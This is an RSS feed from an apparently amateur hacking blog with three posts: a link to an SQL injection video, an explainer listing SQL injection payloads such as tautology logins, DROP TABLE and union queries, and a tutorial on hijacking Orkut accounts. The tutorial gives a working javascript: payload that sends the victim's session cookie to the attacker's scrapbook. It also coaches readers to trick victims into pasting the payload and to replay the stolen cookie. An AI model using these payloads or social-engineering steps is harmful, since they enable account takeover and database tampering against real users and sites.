<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Articles &#187; cracking</title>
	<atom:link href="http://hackingarticles.com/tag/cracking/feed/" rel="self" type="application/rss+xml" />
	<link>http://hackingarticles.com</link>
	<description>The right place to learn all about Ethical Hacking and Internet Security</description>
	<lastBuildDate>Thu, 19 Aug 2010 21:45:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Video Tutorial on SQL Injection</title>
		<link>http://hackingarticles.com/sql-injection-video/</link>
		<comments>http://hackingarticles.com/sql-injection-video/#comments</comments>
		<pubDate>Thu, 14 May 2009 23:46:21 +0000</pubDate>
		<dc:creator>Bhanu</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[crackers]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hack admin]]></category>
		<category><![CDATA[hack passwords]]></category>
		<category><![CDATA[hack website]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[hacking tutorial]]></category>
		<category><![CDATA[hacking tutorials]]></category>
		<category><![CDATA[password]]></category>
		<category><![CDATA[sql attack]]></category>

		<guid isPermaLink="false">http://hackingarticles.com/?p=168</guid>
		<description><![CDATA[<a href="http://hackingarticles.com/sql-injection-video/"><img align="left" hspace="5" width="150" height="150" src="http://hackingarticles.com/wp-content/plugins/thumbnail-for-excerpts/tfe_no_thumb.png" class="alignleft wp-post-image tfe" alt="" title="" /></a>Do subscribe and say thanks, If you like this video tutorial.. You can download the shown strings in the video from Here: Click Here To Download! Video only for educational purposes only!]]></description>
			<content:encoded><![CDATA[<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="350" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="quality" value="high" /><param name="src" value="http://www.youtube.com/v/t1ueX4GQfMY" /><embed type="application/x-shockwave-flash" width="425" height="350" src="http://www.youtube.com/v/t1ueX4GQfMY" quality="high"></embed></object></p>
<p>Do subscribe and say thanks, If you like this video tutorial..</p>
<p>You can download the shown strings in the video from <a href="http://rapidshare.com/files/259879594/strings.txt" target="_blank">Here</a>:</p>
<p><a href="http://rapidshare.com/files/259879594/strings.txt" target="_blank">Click Here To Download!</a></p>
<p>Video only for educational purposes only!</p>
]]></content:encoded>
			<wfw:commentRss>http://hackingarticles.com/sql-injection-video/feed/</wfw:commentRss>
		<slash:comments>28</slash:comments>
		</item>
		<item>
		<title>What is SQL Injection?</title>
		<link>http://hackingarticles.com/what-is-sql-injection/</link>
		<comments>http://hackingarticles.com/what-is-sql-injection/#comments</comments>
		<pubDate>Thu, 14 May 2009 20:52:20 +0000</pubDate>
		<dc:creator>Bhanu</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[crackers]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hack website]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[hacking website]]></category>
		<category><![CDATA[inject website]]></category>
		<category><![CDATA[injection]]></category>
		<category><![CDATA[sql]]></category>

		<guid isPermaLink="false">http://hackingarticles.com/?p=159</guid>
		<description><![CDATA[<a href="http://hackingarticles.com/what-is-sql-injection/"><img align="left" hspace="5" width="150" src="http://farm3.static.flickr.com/2116/3531266995_2a9248df9c.jpg" class="alignleft wp-post-image tfe" alt="SQL Injection" title="SQL Injection" /></a>SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly &#8230; <a href="http://hackingarticles.com/what-is-sql-injection/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" title="SQL Injection" src="http://farm3.static.flickr.com/2116/3531266995_2a9248df9c.jpg" alt="3531266995 2a9248df9c What is SQL Injection?" width="400" height="266" /></p>
<p>SQL injection is most common methodology employed by a hacker to exploit vulnerabilities in software applications. Vulnerabilities are basically weak links in the software that exposes unauthorized data/information to a user. SQL injection occurs when the user input is incorrectly filtered for embedded SQL statements.<br />
The technique is powerful enough not only to expose the information to the user but also modify and delete the content which could prove disastrous to the company.</p>
<p>SQL injection vulnerabilities have three forms:  <span id="more-159"></span></p>
<p><strong> </strong></p>
<p><strong><span style="font-size: 12pt;">Incorrectly filtered special characters: escape characters</span></strong></p>
<p>This form of SQL injection occurs when the user manipulates the SQL statements using characters such as  &#8217;.  For instance consider that you need to enter username and password while logging into your account. The SQL statement generated will be:<br />
&#8220;SELECT * FROM users WHERE password =    &#8217;&#8221; + password + &#8220;&#8216;;&#8221;</p>
<p>Now suppose the userName and/or password so entered are”  ‘ or ‘1’=’1”. So the SQL statement reaching the back end will be:</p>
<p>&#8220;SELECT * FROM users WHERE password =&#8217;  ‘or ‘1’=’1 &#8216;;&#8221;</p>
<p>Look closely at this statement. It is deciphered by the database as select everything from the table “user” having field name equal to ‘ ‘ or 1=1. During authentication process, this condition will always be valid as 1 will always equal 1. Thus this way the user is given unauthorized access.</p>
<p>List of Some Important inputs used by hackers to use SQL Injection technique are:<br />
a)  ‘ or ‘a’=’a<br />
b)  ‘ or 1=1 &#8211;<br />
c)  ‘ or 1=1; &#8211;<br />
d)  ‘; select * from *; &#8211;<br />
e)  ‘ (Single quote)(Here we look at the error)<br />
f)  ‘; drop table users –</p>
<p>On some SQL servers such as MS SQL Server any valid SQL command may be injected via this method, including the execution of multiple statements. The following value of &#8220;username&#8221; in the statement below would cause the deletion of the &#8220;users&#8221; table as well as the selection of all data from the &#8220;data&#8221; table (in essence revealing the information of every user):<br />
a&#8217;;DROP TABLE users; SELECT * FROM data WHERE name LIKE &#8216;%</p>
<p><strong><span style="font-size: 12pt;">Incorrectly handling input data type</span></strong></p>
<p>This form of SQL injection occurs when the user input is not strongly typed i.e. , the input by the user is not checked for data type constraint. For example consider a field where you are asked to enter your phone number. Since the phone number input is of numeric data type, therefore the input must be checked whether it is numeric or not. If not checked, then the user can send alphanumeric input and embedded SQL statements. Consider the following SQL statement:<br />
“SELECT * FROM user WHERE telephone = “+ input +”;”<br />
Now if I can input alphanumeric data say “11111111;DROP TABLE user” then I have embedded an SQL statement to delete the entire table “user”. This might prove detrimental to the company!!!</p>
<p>If you happen to know the database table name and column names, then any user can perform SQL injection using the following inputs:</p>
<ol>
<li>&#8216; having 1=1 &#8211;</li>
<li>&#8216; group by user.id having 1=1 &#8211;</li>
<li>&#8216; group by users.id, users.username, users.password, users.privs having 1=1—</li>
<li>&#8216; union select sum(users.username) from users—</li>
<li>&#8216; union select sum(id) from users –</li>
</ol>
<p><strong><span style="font-size: 12pt;">Vulnerabilities inside the database server</span></strong></p>
<p>Sometimes vulnerabilities can exist within the database server software itself, as was the case with the MySQL server&#8217;s real_escape_chars() functions.<br />
If the database server is not properly configured then the access to the database can easily be found out by the hacker.<br />
The hacker can get information regarding the database server using the following input:<br />
&#8216; union select @@version,1,1,1—</p>
<ol>
<li>Extended Stored Procedure Attacks</li>
<li>sp_who: this will show all users that are currently connected to the database.</li>
<li>xp_readmail, , , , ,@peek=’false’ : this will read all the mails and leave the message as unread.</li>
</ol>
<p>In the same way there is a list of such extended stored procedures that can be used by the hacker to exploit vulnerabilities existing in software application at the database layer.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackingarticles.com/what-is-sql-injection/feed/</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>How to Hack Orkut Accounts through Cookie Stealing?</title>
		<link>http://hackingarticles.com/how-to-hack-orkut-accounts-through-cookie-stealing/</link>
		<comments>http://hackingarticles.com/how-to-hack-orkut-accounts-through-cookie-stealing/#comments</comments>
		<pubDate>Sun, 10 May 2009 18:37:12 +0000</pubDate>
		<dc:creator>Bhanu</dc:creator>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[cookie stealing]]></category>
		<category><![CDATA[crack]]></category>
		<category><![CDATA[cracking]]></category>
		<category><![CDATA[gmail]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hack gmail]]></category>
		<category><![CDATA[hack orkut]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[hacking gmail]]></category>
		<category><![CDATA[hacking orkut]]></category>
		<category><![CDATA[orkut]]></category>

		<guid isPermaLink="false">http://hackingarticles.com/?p=88</guid>
		<description><![CDATA[<a href="http://hackingarticles.com/how-to-hack-orkut-accounts-through-cookie-stealing/"><img align="left" hspace="5" width="150" src="http://farm4.static.flickr.com/3577/3519295096_c16461d86b.jpg" class="alignleft wp-post-image tfe" alt="cookie" title="" /></a>Well guys, here I am again writing a tutorial on &#8220;How to hack Orkut Accounts through Cookie Stealing&#8221; because one of my good friend asked me to post an article on this thingy.Well here you go now. Follow the procedure &#8230; <a href="http://hackingarticles.com/how-to-hack-orkut-accounts-through-cookie-stealing/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.hackingarticles.com/how-to-hack-orkut-accounts-through-cookie-stealing" target="_self"><img class="aligncenter" src="http://farm4.static.flickr.com/3577/3519295096_c16461d86b.jpg" alt="3519295096 c16461d86b How to Hack Orkut Accounts through Cookie Stealing?" width="337" height="245" title="How to Hack Orkut Accounts through Cookie Stealing?" /></a>Well guys, here I am again writing a tutorial on &#8220;How to hack Orkut Accounts through Cookie Stealing&#8221; because one of my good friend asked me to post an article on this thingy.Well here you go now.</p>
<p>Follow the procedure and guess what&#8230;..You&#8217;ll learn another trick to hack orkut accounts apart from password stealing or <a href="http://hackingarticles.com/phishing-tutorial-explained-stepwise/" target="_blank">Phishing</a>. <img src='http://hackingarticles.com/wp-includes/images/smilies/icon_biggrin.gif' alt="icon biggrin How to Hack Orkut Accounts through Cookie Stealing?" class='wp-smiley' title="How to Hack Orkut Accounts through Cookie Stealing?" /> </p>
<p><span id="more-88"></span></p>
<p>Let me tell you guys again that- <strong>&#8220;THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHORS OF HACKINGARTICLES.COM ARE NOT LIABLE FOR ANY ILLEGAL ACT CARRIED OUT BY YOU OR ANYONE ELSE.&#8221;</strong></p>
<p>Now without wasting anytime read the following procedure:</p>
<p>1.Firstly you need to have <a href="http://www.mozilla.com/en-US/firefox/personal.html" target="_blank">Mozilla firefox</a> installed.<br />
2.Download cookie editor plugin for Mozilla firefox from:</p>
<p><a href="http://addons.mozilla.org/en-US/firefox/addon/573" target="_blank"><strong>COOKIE EDITOR</strong></a></p>
<p>3.You need to have two fake accounts to Hack Orkut or Gmail , So that you have to receive cookies to one Orkut account and other Orkut account for Advertising your Script, Well it depends on your Choice to have Two Gmail(Orkut) accounts.</p>
<p>Cookie Script:</p>
<blockquote><p>javascript:nobody=replyForm;nobody.toUserId.value=34536569;<br />
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?<br />
Action.submit’;nobody.submit()</p></blockquote>
<p>How to use cookies script?</p>
<p>1. Replace your Uid number “UserId.value=34536569?<br />
How to Replace your Uid<br />
1. Go to your album<br />
2. Right click on any Photo&gt; Properties&gt;55886645.jpg It will be a Eight Digit Value.<br />
3. Now replace your value with the value in the java script.<br />
Your script will look like.</p>
<blockquote><p>javascript:nobody=replyForm;nobody.toUserId.value=yournumber;<br />
nobody.scrapText.value=document.cookie;nobody.action=’scrapbook.aspx?<br />
Action.submit’;nobody.submit()</p></blockquote>
<p>2.Now send this Cookie script to the victim and ask him to paste in Address bar and Press enter</p>
<p>3.You’ll Get his cookie in your scrapbook.</p>
<p>4.After Getting a cookie go to your orkut Home page , Then click on Tools tab and then go to cookie editor plugin( Tools–&gt; Cookie editor)</p>
<p>5.click filter/refresh.look for ‘orkut_state’ cookie. just double click it and replace the orkut_state part with your victim’s Script<br />
put ur eight digit number in the place of (34536569).</p>
<p>Thats it your done with.</p>
<p>Logout of your orkut and login again and you’ll be in your victims Homepage.</p>
<p>6.So remember guys…if ur on orkut or having any other account….never click or paste in address bar any suspicious script to prevent anyone from hacking/accessing your account.</p>
<p>I hope you have learned how to hack orkut accounts using cookie stealing. Just the script can be used to hack orkut accounts and then access victim’s orkut account. You wont be hacking any password here. But just the cookies. Go have some fun with it and<strong> Do Not Forget To Subscribe.</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://hackingarticles.com/how-to-hack-orkut-accounts-through-cookie-stealing/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
	</channel>
</rss>

